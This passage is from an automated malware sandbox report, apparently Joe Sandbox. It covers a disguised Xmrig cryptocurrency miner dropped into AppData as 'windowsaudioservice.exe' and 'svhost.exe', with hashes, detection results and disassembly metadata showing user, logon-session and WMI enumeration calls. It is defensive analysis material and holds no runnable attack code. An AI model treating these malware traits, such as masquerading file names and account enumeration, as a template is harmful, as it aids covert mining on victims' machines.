                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:4
                              Start time:08:39:47
                              Start date:05/08/2024
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                              Imagebase:0x7ff7403e0000
                              File size:55'320 bytes
                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:5
                              Start time:08:41:01
                              Start date:05/08/2024
                              Path:C:\Users\user\AppData\Local\Windows\windowsaudioservice.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\AppData\Local\Windows\windowsaudioservice.exe"
                              Imagebase:0x140000000
                              File size:4'876'304 bytes
                              MD5 hash:BC35928AAFC2827CE620E2AA679AADD5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000003.3325195819.0000000002390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 38%, ReversingLabs
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:6
                              Start time:08:41:01
                              Start date:05/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:7
                              Start time:08:41:05
                              Start date:05/08/2024
                              Path:C:\Users\user\AppData\Local\Windows\svhost.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\AppData\Local\Windows\svhost.exe"
                              Imagebase:0x7ff7af530000
                              File size:3'414'528 bytes
                              MD5 hash:E211B2B230EF040FE40BC380899990FC
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 21%, ReversingLabs
                              Reputation:low
                              Has exited:false

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:0.4%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:15.7%
                                Total number of Nodes:102
                                Total number of Limit Nodes:3
                                execution_graph 44594 7ff7af5367c0 44597 7ff7af6ed390 RtlAddVectoredExceptionHandler 44594->44597 44596 7ff7af5367ec 44598 7ff7af6ed4a4 44597->44598 44599 7ff7af6ed3c9 SetThreadStackGuarantee 44597->44599 44635 7ff7af73ae80 6 API calls 44598->44635 44600 7ff7af6ed3ed 44599->44600 44601 7ff7af6ed3de GetLastError 44599->44601 44615 7ff7af703210 44600->44615 44601->44600 44603 7ff7af6ed567 44601->44603 44636 7ff7af73ae80 6 API calls 44603->44636 44606 7ff7af6ed3fe 44612 7ff7af6ed496 44606->44612 44621 7ff7af6ee190 44606->44621 44608 7ff7af6ed43f 44624 7ff7af6f5fd0 44608->44624 44610 7ff7af6ed447 44631 7ff7af53a840 44610->44631 44612->44596 44616 7ff7af703226 44615->44616 44619 7ff7af703256 44616->44619 44637 7ff7af703a60 44616->44637 44618 7ff7af703242 44618->44619 44620 7ff7af703262 GetCurrentThread SetThreadDescription 44618->44620 44619->44606 44620->44619 44646 7ff7af70ef80 6 API calls 44621->44646 44623 7ff7af6ee1bf 44623->44608 44625 7ff7af6f600f 44624->44625 44630 7ff7af6f6041 44624->44630 44626 7ff7af6f610c 44625->44626 44627 7ff7af6f6017 44625->44627 44648 7ff7af73b360 6 API calls 44626->44648 44647 7ff7af703370 6 API calls 44627->44647 44630->44610 44649 7ff7af53a830 44631->44649 44634 7ff7af73a320 9 API calls 44634->44612 44638 7ff7af703a8f 44637->44638 44641 7ff7af703a9c 44637->44641 44639 7ff7af703bde 44638->44639 44638->44641 44645 7ff7af70d960 6 API calls 44639->44645 44642 7ff7af703b71 44641->44642 44644 7ff7af6ecbe0 6 API calls 44641->44644 44642->44618 44644->44642 44645->44642 44646->44623 44647->44630 44652 7ff7af533a50 44649->44652 44650 7ff7af53a836 44650->44612 44650->44634 44653 7ff7af533a8c 44652->44653 44654 7ff7af533dff 44653->44654 44667 7ff7af6b9ec0 44653->44667 44654->44650 44658 7ff7af533cd8 44690 7ff7af6edbd0 44658->44690 44660 7ff7af533d31 44661 7ff7af5353ab 44660->44661 44662 7ff7af533d64 44660->44662 44703 7ff7af73b360 6 API calls 44661->44703 44701 7ff7af532ef0 29 API calls 44662->44701 44665 7ff7af533d9e 44702 7ff7af70dd50 6 API calls 44665->44702 44668 7ff7af6b9ee3 44667->44668 44671 7ff7af6b9f04 44667->44671 44704 7ff7af6b9f50 44668->44704 44670 7ff7af533cc0 44674 7ff7af539070 44670->44674 44671->44670 44708 7ff7af73b360 6 API calls 44671->44708 44675 7ff7af539088 44674->44675 44676 7ff7af5392ab 44674->44676 44678 7ff7af53909a 44675->44678 44679 7ff7af5392c3 44675->44679 44715 7ff7af73af50 6 API calls 44676->44715 44681 7ff7af5390a2 44678->44681 44687 7ff7af5390cc 44678->44687 44716 7ff7af73af50 6 API calls 44679->44716 44683 7ff7af5391ee 44681->44683 44684 7ff7af53922b 44681->44684 44688 7ff7af5390b7 44681->44688 44683->44688 44710 7ff7af5392e0 44683->44710 44686 7ff7af5392e0 8 API calls 44684->44686 44684->44688 44686->44688 44687->44688 44689 7ff7af5392e0 8 API calls 44687->44689 44688->44658 44689->44687 44691 7ff7af6edbe2 44690->44691 44692 7ff7af6edbea CreateWaitableTimerExW 44690->44692 44691->44692 44696 7ff7af6edc83 44691->44696 44693 7ff7af6edc05 44692->44693 44692->44696 44694 7ff7af6edc7a CloseHandle 44693->44694 44699 7ff7af6edc29 SetWaitableTimer 44693->44699 44694->44696 44695 7ff7af6edc78 44695->44696 44697 7ff7af6edcc9 Sleep 44695->44697 44696->44695 44698 7ff7af6edccf 44697->44698 44698->44660 44699->44694 44700 7ff7af6edc5a WaitForSingleObject CloseHandle 44699->44700 44700->44695 44700->44698 44701->44665 44702->44654 44705 7ff7af6b9f65 44704->44705 44706 7ff7af6b9f73 44704->44706 44705->44671 44709 7ff7af703370 6 API calls 44706->44709 44709->44705 44717 7ff7af6bc760 44710->44717 44712 7ff7af53931e 44714 7ff7af539323 44712->44714 44730 7ff7af6bc570 6 API calls 44712->44730 44714->44688 44718 7ff7af6bc76a 44717->44718 44725 7ff7af6bc796 44717->44725 44731 7ff7af6bc9d0 44718->44731 44720 7ff7af6bc775 44721 7ff7af71b3ba 44720->44721 44720->44725 44736 7ff7af73b400 6 API calls 44720->44736 44722 7ff7af71b41e 44721->44722 44737 7ff7af73b400 6 API calls 44721->44737 44722->44712 44725->44712 44730->44714 44732 7ff7af6bca3a 44731->44732 44733 7ff7af6bc9e3 44731->44733 44732->44720 44733->44732 44734 7ff7af6bca08 BCryptGenRandom 44733->44734 44734->44733 44735 7ff7af6bca2c SystemFunction036 44734->44735 44735->44732 44735->44733

                                Executed Functions

                                Function 00007FF7AF6ED390 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ErrorExceptionGuaranteeHandlerLastStackThreadVectored
                                • String ID: main
                                • API String ID: 1207050972-3207122276
                                • Opcode ID: a4a8d8e01b2f799f4f4b9aa0ca92db31bb00b7e4b196612cd4293e05e270d810
                                • Instruction ID: 88cfe9babeea6571b53e5276e1d3afb13cb4508246d64412a0bf8fd770d62fc9
                                • Opcode Fuzzy Hash: a4a8d8e01b2f799f4f4b9aa0ca92db31bb00b7e4b196612cd4293e05e270d810
                                • Instruction Fuzzy Hash: 9B715D26A06B82D9EB10EF60D8403EC77B5FB48758FD24636DA4D43AA8DF38D589C350
                                Function 00007FF7AF6BC9D0 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 135 7ff7af6bc9d0-7ff7af6bc9e1 136 7ff7af6bca42 135->136 137 7ff7af6bc9e3-7ff7af6bc9fd 135->137 139 7ff7af6bca44-7ff7af6bca54 136->139 138 7ff7af6bca08-7ff7af6bca2a BCryptGenRandom 137->138 140 7ff7af6bca00-7ff7af6bca06 138->140 141 7ff7af6bca2c-7ff7af6bca38 SystemFunction036 138->141 140->136 140->138 141->140 142 7ff7af6bca3a-7ff7af6bca40 141->142 142->139
                                APIs
                                • BCryptGenRandom.BCRYPT(00000000,00000000,00000000,00007FF7AF6BC775,?,?,?,00007FF7AF53931E), ref: 00007FF7AF6BCA22
                                • SystemFunction036.ADVAPI32(?,?,?,00007FF7AF53931E), ref: 00007FF7AF6BCA33
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: CryptFunction036RandomSystem
                                • String ID:
                                • API String ID: 1232939966-0
                                • Opcode ID: 4f096f86013abb9df68425d45f9e934df7966b0b0cd25df55baaf9492e745663
                                • Instruction ID: ae5c9754e30c10d133c7e110f02fad43c4af47e5cc634cdac552efab2eaff5fd
                                • Opcode Fuzzy Hash: 4f096f86013abb9df68425d45f9e934df7966b0b0cd25df55baaf9492e745663
                                • Instruction Fuzzy Hash: 34F0F452F4A1D511FA64AD6A3D045B0D3462F18BF0DAA4335EC7D43BE4ED3C99825210
                                Function 00007FF7AF6EDBD0 Relevance: 9.1, APIs: 6, Instructions: 79timesleepsynchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                • String ID:
                                • API String ID: 2261246915-0
                                • Opcode ID: dad4711f8e8b20e2bec09b757a9f1c0c4034a8772ddfc8546deb8c8aa7b588a0
                                • Instruction ID: a130a29fb0bd13b3124f1c9cce11e02c1de9bea150fb2496b62be020dd38c716
                                • Opcode Fuzzy Hash: dad4711f8e8b20e2bec09b757a9f1c0c4034a8772ddfc8546deb8c8aa7b588a0
                                • Instruction Fuzzy Hash: 9F215723B4BA8242EE5CAB20A8257B4915E5F89FD4FC66334DA1F863F0DE6D64028210
                                Function 00007FF7AF703210 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: Thread$CurrentDescription
                                • String ID:
                                • API String ID: 654298328-0
                                • Opcode ID: 3e711f2026e8134c2658c44be1e6fd58445d70a7f6bf12b8dd9f02a448022669
                                • Instruction ID: 23d52f46171a94bb96e7e06042abef455f76d6d061d2253e327ef6405e66239e
                                • Opcode Fuzzy Hash: 3e711f2026e8134c2658c44be1e6fd58445d70a7f6bf12b8dd9f02a448022669
                                • Instruction Fuzzy Hash: 9A01F746E0E9C241E950B715E9043FAD761AF89FD0FC24032EE4D17BB9DE1CD9428710

                                Non-executed Functions

                                Function 00007FF7AF6D2570 Relevance: 24.5, APIs: 16, Instructions: 529COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 270 7ff7af6d2570-7ff7af6d25c6 271 7ff7af6d25d0-7ff7af6d2621 NetUserEnum 270->271 272 7ff7af6d2623-7ff7af6d262a 271->272 273 7ff7af6d2630-7ff7af6d263f 271->273 272->273 274 7ff7af6d2b67 272->274 275 7ff7af6d2655-7ff7af6d2658 273->275 276 7ff7af6d2b6b-7ff7af6d2b6e 274->276 277 7ff7af6d2b40-7ff7af6d2b4b 275->277 278 7ff7af6d265e-7ff7af6d2669 275->278 280 7ff7af6d2b70-7ff7af6d2b77 NetApiBufferFree 276->280 281 7ff7af6d2b7c-7ff7af6d2bad LsaEnumerateLogonSessions 276->281 277->276 279 7ff7af6d2b4d-7ff7af6d2b50 277->279 278->275 282 7ff7af6d266b-7ff7af6d268b NetUserGetInfo 278->282 279->271 283 7ff7af6d2b56-7ff7af6d2b62 NetApiBufferFree 279->283 280->281 284 7ff7af6d2bb3-7ff7af6d2bcc 281->284 285 7ff7af6d2e4a-7ff7af6d2e63 281->285 286 7ff7af6d26a0-7ff7af6d26ae 282->286 287 7ff7af6d268d-7ff7af6d2697 282->287 283->271 288 7ff7af6d2bdc-7ff7af6d2bdf 284->288 292 7ff7af6d2e74-7ff7af6d2e8b 285->292 293 7ff7af6d2e65-7ff7af6d2e6f LsaFreeReturnBuffer 285->293 289 7ff7af6d2650 NetApiBufferFree 286->289 291 7ff7af6d26b0-7ff7af6d26ba IsValidSid 286->291 287->289 290 7ff7af6d2699 287->290 294 7ff7af6d2e43 288->294 295 7ff7af6d2be5-7ff7af6d2c02 LsaGetLogonSessionData 288->295 289->275 290->275 291->287 296 7ff7af6d26bc-7ff7af6d26d2 GetLengthSid 291->296 293->292 294->285 297 7ff7af6d2e30-7ff7af6d2e33 295->297 298 7ff7af6d2c08-7ff7af6d2c0b 295->298 299 7ff7af6d26d4-7ff7af6d26e1 call 7ff7af6bdc60 296->299 300 7ff7af6d26e8 296->300 297->288 302 7ff7af6d2e39-7ff7af6d2e3e LsaFreeReturnBuffer 297->302 298->297 303 7ff7af6d2c11-7ff7af6d2c15 298->303 301 7ff7af6d26ed-7ff7af6d2708 CopySid 299->301 310 7ff7af6d26e3-7ff7af6d2eaf call 7ff7af73ac10 299->310 300->301 305 7ff7af6d27d6-7ff7af6d27e8 301->305 306 7ff7af6d270e-7ff7af6d2720 301->306 302->288 307 7ff7af6d2bd7 LsaFreeReturnBuffer 303->307 308 7ff7af6d2c17-7ff7af6d2c3a call 7ff7af6c9bc0 303->308 305->287 313 7ff7af6d27ee-7ff7af6d27f9 call 7ff7af6bdc20 305->313 311 7ff7af6d2726-7ff7af6d2729 306->311 312 7ff7af6d2e8c-7ff7af6d2e9c call 7ff7af73b050 306->312 307->288 323 7ff7af6d2c3c-7ff7af6d2c6a 308->323 324 7ff7af6d2bce-7ff7af6d2bd5 308->324 328 7ff7af6d2f0a-7ff7af6d2f33 310->328 316 7ff7af6d272f-7ff7af6d2766 call 7ff7af6c9d40 311->316 317 7ff7af6d2eb1-7ff7af6d2ef4 call 7ff7af735b40 311->317 312->328 313->287 335 7ff7af6d276c-7ff7af6d2776 316->335 336 7ff7af6d27fe-7ff7af6d280d 316->336 317->328 329 7ff7af6d2c6c-7ff7af6d2c7e 323->329 330 7ff7af6d2cde-7ff7af6d2d10 call 7ff7af6c9d40 323->330 324->288 324->307 337 7ff7af6d2f35 NetApiBufferFree 328->337 338 7ff7af6d2f3a-7ff7af6d2f51 328->338 334 7ff7af6d2c89-7ff7af6d2c8e 329->334 349 7ff7af6d2d12-7ff7af6d2d5a call 7ff7af70ea70 330->349 350 7ff7af6d2d5c-7ff7af6d2d63 330->350 341 7ff7af6d2c80-7ff7af6d2c87 334->341 342 7ff7af6d2c90-7ff7af6d2ca6 call 7ff7af72ec00 334->342 343 7ff7af6d2780-7ff7af6d278b 335->343 340 7ff7af6d2814-7ff7af6d287a NetUserGetLocalGroups 336->340 337->338 345 7ff7af6d28a0-7ff7af6d28aa 340->345 346 7ff7af6d287c-7ff7af6d289b 340->346 341->330 341->334 342->341 362 7ff7af6d2ca8-7ff7af6d2cc1 342->362 343->343 348 7ff7af6d278d-7ff7af6d27d4 call 7ff7af70ea70 343->348 353 7ff7af6d28ac-7ff7af6d28d2 call 7ff7af6bdbf0 345->353 354 7ff7af6d28d9 345->354 352 7ff7af6d2a22-7ff7af6d2a56 346->352 348->340 351 7ff7af6d2d6a-7ff7af6d2dbd 349->351 350->351 359 7ff7af6d2dd5 351->359 360 7ff7af6d2dbf-7ff7af6d2dd3 call 7ff7af5c9b60 351->360 363 7ff7af6d2a5d-7ff7af6d2abe 352->363 364 7ff7af6d2a58 NetApiBufferFree 352->364 365 7ff7af6d28de-7ff7af6d2901 353->365 376 7ff7af6d28d4-7ff7af6d2f05 call 7ff7af73ac10 353->376 354->365 368 7ff7af6d2dd9-7ff7af6d2e22 359->368 360->368 362->324 370 7ff7af6d2cc7-7ff7af6d2cd9 call 7ff7af6bdc20 362->370 371 7ff7af6d2ac0-7ff7af6d2adb call 7ff7af5c9b60 363->371 372 7ff7af6d2add-7ff7af6d2ae4 363->372 364->363 373 7ff7af6d2903-7ff7af6d290c 365->373 374 7ff7af6d2936-7ff7af6d2960 365->374 368->297 370->324 381 7ff7af6d2ae8-7ff7af6d2b2d 371->381 372->381 379 7ff7af6d2965-7ff7af6d2978 373->379 380 7ff7af6d290e-7ff7af6d2934 call 7ff7af733b10 373->380 374->363 376->328 379->352 382 7ff7af6d297e-7ff7af6d2988 379->382 380->382 381->287 387 7ff7af6d2990-7ff7af6d299b 382->387 390 7ff7af6d29a0-7ff7af6d29ab 387->390 390->390 391 7ff7af6d29ad-7ff7af6d2a1c call 7ff7af70ea70 390->391 391->352 391->387
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: BufferFreeLogonUser$DataEnumEnumerateInfoReturnSessionSessions
                                • String ID:
                                • API String ID: 4188463628-0
                                • Opcode ID: 0b2460a6b7789e541de62d572817369007972d6ab59bd4642c4a2316fe148657
                                • Instruction ID: c190c1fbd53dc6539b7e8db5e709843103418e0b9a555aff8816be614fed3897
                                • Opcode Fuzzy Hash: 0b2460a6b7789e541de62d572817369007972d6ab59bd4642c4a2316fe148657
                                • Instruction Fuzzy Hash: FB428D22606BC589EBA09F25C8403EC77A5FB4878CF819136DE4D5BBA9DF38D295C350
                                Function 00007FF7AF6C8B80 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 330comCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 645 7ff7af6c8b80-7ff7af6c8c1b CoInitializeEx CoInitializeSecurity 646 7ff7af6c8c21-7ff7af6c8c84 CoCreateInstance 645->646 647 7ff7af6c8f02-7ff7af6c8f05 645->647 648 7ff7af6c8f15-7ff7af6c8f1d 646->648 649 7ff7af6c8c8a-7ff7af6c8cdb call 7ff7af6c9630 646->649 650 7ff7af6c8f0b-7ff7af6c8f10 CoUninitialize 647->650 651 7ff7af6c9008-7ff7af6c9017 647->651 654 7ff7af6c8f1f-7ff7af6c8f29 648->654 655 7ff7af6c8f31-7ff7af6c8f4b 648->655 649->651 661 7ff7af6c8ce1-7ff7af6c8d20 649->661 650->651 653 7ff7af6c901f-7ff7af6c903f 651->653 654->655 656 7ff7af6c8f2b 654->656 657 7ff7af6c8f4d-7ff7af6c8f50 655->657 658 7ff7af6c8f58-7ff7af6c8f5f 655->658 656->655 657->658 660 7ff7af6c8f52 657->660 658->651 662 7ff7af6c8f65-7ff7af6c8f6a CoUninitialize 658->662 660->658 663 7ff7af6c8d26-7ff7af6c8d60 CoSetProxyBlanket 661->663 664 7ff7af6c8f6f-7ff7af6c8f77 661->664 662->651 663->664 665 7ff7af6c8d66-7ff7af6c8d71 663->665 666 7ff7af6c8f95-7ff7af6c8f98 664->666 667 7ff7af6c8f79-7ff7af6c8f83 664->667 665->651 668 7ff7af6c8d77-7ff7af6c8dc0 call 7ff7af6c97a0 665->668 670 7ff7af6c8fba-7ff7af6c8fd4 666->670 671 7ff7af6c8f9a-7ff7af6c8fa4 666->671 667->666 669 7ff7af6c8f85-7ff7af6c8f8c 667->669 668->651 679 7ff7af6c8dc6-7ff7af6c8e4d call 7ff7af6c9930 668->679 669->666 672 7ff7af6c8fd6-7ff7af6c8fd9 670->672 673 7ff7af6c8fef-7ff7af6c8ff6 670->673 671->670 675 7ff7af6c8fa6-7ff7af6c8fad 671->675 672->673 676 7ff7af6c8fdb-7ff7af6c8fe2 672->676 673->651 677 7ff7af6c8ff8-7ff7af6c9003 CoUninitialize 673->677 675->670 676->673 677->651 682 7ff7af6c8e53-7ff7af6c8e56 679->682 683 7ff7af6c9040-7ff7af6c90b6 call 7ff7af5c93f0 679->683 685 7ff7af6c8e74-7ff7af6c8e77 682->685 686 7ff7af6c8e58-7ff7af6c8e5b 682->686 683->651 694 7ff7af6c90bc-7ff7af6c9180 call 7ff7af6bdbf0 683->694 688 7ff7af6c8ea5-7ff7af6c8ea8 685->688 689 7ff7af6c8e79-7ff7af6c8e81 685->689 686->685 687 7ff7af6c8e5d-7ff7af6c8e6b 686->687 687->685 692 7ff7af6c8eda-7ff7af6c8edc 688->692 693 7ff7af6c8eaa-7ff7af6c8eb2 688->693 689->688 691 7ff7af6c8e83-7ff7af6c8e98 689->691 691->688 692->651 696 7ff7af6c8ee2-7ff7af6c8efd CoUninitialize 692->696 693->692 695 7ff7af6c8eb4-7ff7af6c8ecd 693->695 699 7ff7af6c9182-7ff7af6c91d6 694->699 700 7ff7af6c91db-7ff7af6c9234 call 7ff7af73ac10 call 7ff7af6c81e0 694->700 695->692 696->651 699->653
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: String$AllocFreeUninitialize$Initialize$BlanketClearCreateInstanceProxySecurityVariant
                                • String ID: Computer
                                • API String ID: 2056256836-1542374896
                                • Opcode ID: 38c727118814241a9c4107687be51fb95b4dea015e4213b42793b0b4a8ef682a
                                • Instruction ID: 00e886de4ba1ec23122412fd4b09d81e3b2c68408d7f3df23b1fb59c51a4f4f7
                                • Opcode Fuzzy Hash: 38c727118814241a9c4107687be51fb95b4dea015e4213b42793b0b4a8ef682a
                                • Instruction Fuzzy Hash: DF026B32A09BC589E7B19F35D8443ED77A1FB8834CF459225DE8D0ABA9DF399285C310
                                Function 00007FF7AF6D4400 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 422fileCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: CloseHandle$ControlCreateDeviceDiskFileFreeSpace
                                • String ID:
                                • API String ID: 1453114904-3916222277
                                • Opcode ID: 900a06b8f141e2e78371eae354944e868ccfd3e2148617689fa35829d4792309
                                • Instruction ID: e6efda4094dad01d8cd2c70650e6ec1749747703372a954cba1a8abc1aa2711d
                                • Opcode Fuzzy Hash: 900a06b8f141e2e78371eae354944e868ccfd3e2148617689fa35829d4792309
                                • Instruction Fuzzy Hash: 9E22A62290BBC288F770AF21D8487FD6269FB44388F855237CA5D0AAE4DF7C9694C311
                                Function 00007FF7AF734130 Relevance: 10.7, Strings: 8, Instructions: 708COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: arenegyl$arenegyl$modnarod$modnarod$setybdet$setybdet$uespemos$uespemos
                                • API String ID: 0-1116813384
                                • Opcode ID: aff9de7efaa2df369f10a78f71ee685849564e5995f8d226586d79265cb386f7
                                • Instruction ID: 9b494af40a0d2255d60af68eefcd4cf6f79829d87b31d48f2dd37b618b9913fc
                                • Opcode Fuzzy Hash: aff9de7efaa2df369f10a78f71ee685849564e5995f8d226586d79265cb386f7
